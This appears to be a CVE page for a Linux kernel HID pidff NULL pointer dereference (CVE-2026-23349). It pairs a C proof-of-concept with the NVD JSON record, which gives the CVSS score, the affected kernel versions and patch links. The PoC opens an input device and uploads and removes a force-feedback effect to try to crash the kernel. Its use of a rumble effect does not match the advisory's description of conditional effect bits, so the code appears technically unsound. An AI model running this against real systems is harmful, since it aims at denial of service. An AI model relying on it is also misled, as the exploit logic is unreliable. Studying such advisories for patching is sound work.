CVE-2026-23349

/* * PoC for CVE-2026-23349: HID pidff NULL Pointer Dereference * Triggering the bug requires interacting with a force feedback device. */ #include <linux/input.h> #include <fcntl.h> #include <stdio.h> #include <unistd.h> #include <string.h> int main(int argc, char **argv) { int fd; struct ff_effect effect; const char *device = "/dev/input/event0"; // Adjust device path as needed // Open the input device fd = open(device, O_RDWR); if (fd < 0) { perror("open"); return 1; } memset(&effect, 0, sizeof(effect)); effect.type = FF_RUMBLE; // Using rumble effect to trigger ffbit logic effect.id = -1; effect.u.rumble.strong_magnitude = 0x8000; effect.u.rumble.weak_magnitude = 0x8000; // Upload the effect to the device if (ioctl(fd, EVIOCSFF, &effect) < 0) { perror("ioctl EVIOCSFF"); close(fd); return 1; } // Remove effect to trigger the clearing logic (where the bug exists) // The bug occurs when clearing conditional effect bits improperly. if (ioctl(fd, EVIOCRMFF, effect.id) < 0) { perror("ioctl EVIOCRMFF"); close(fd); return 1; } printf("PoC executed successfully. If vulnerable, kernel may crash.\n"); close(fd); return 0; }

{"cve": {"id": "CVE-2026-23349", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:33.197", "lastModified": "2026-04-24T18:06:21.640", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: pidff: Fix condition effect bit clearing\n\nAs reported by MPDarkGuy on discord, NULL pointer dereferences were\nhappening because not all the conditional effects bits were cleared.\n\nProperly clear all conditional effect bits from ffbit"}, {"lang": "es", "value": "En el kernel de Linux, se ha resuelto la siguiente vulnerabilidad:\n\nHID: pidff: Corrección del borrado de bits de efecto de condición\n\nSegún lo informado por MPDarkGuy en Discord, se estaban produciendo desreferencias de puntero NULL porque no se borraron todos los bits de efectos condicionales.\n\nBorrar correctamente todos los bits de efecto condicional de ffbit"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.18.1", "versionEndExcluding": "6.18.17", "matchCriteriaId": "07E9D8CD-82F0-4CC6-8038-BF71758D583C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.7", "matchCriteriaId": "69245D10-0B71-485E-80C3-A64F077004D3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.18:-:*:*:*:*:*:*", "matchCriteriaId": "DCE57113-2223-4308-A0F2-5E6ECFBB3C23"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc7:*:*:*:*:*:*", "matchCriteriaId": "512EE3A8-A590-4501-9A94-5D4B268D6138"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/97d5c8f5c09a604c4873c8348f58de3cea69a7df", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d1edc027a4b0bb4c7a2670b530590b4df6177011", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ef0e669dbceaf3d7bb4ae0b235fa61feabd92b0b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}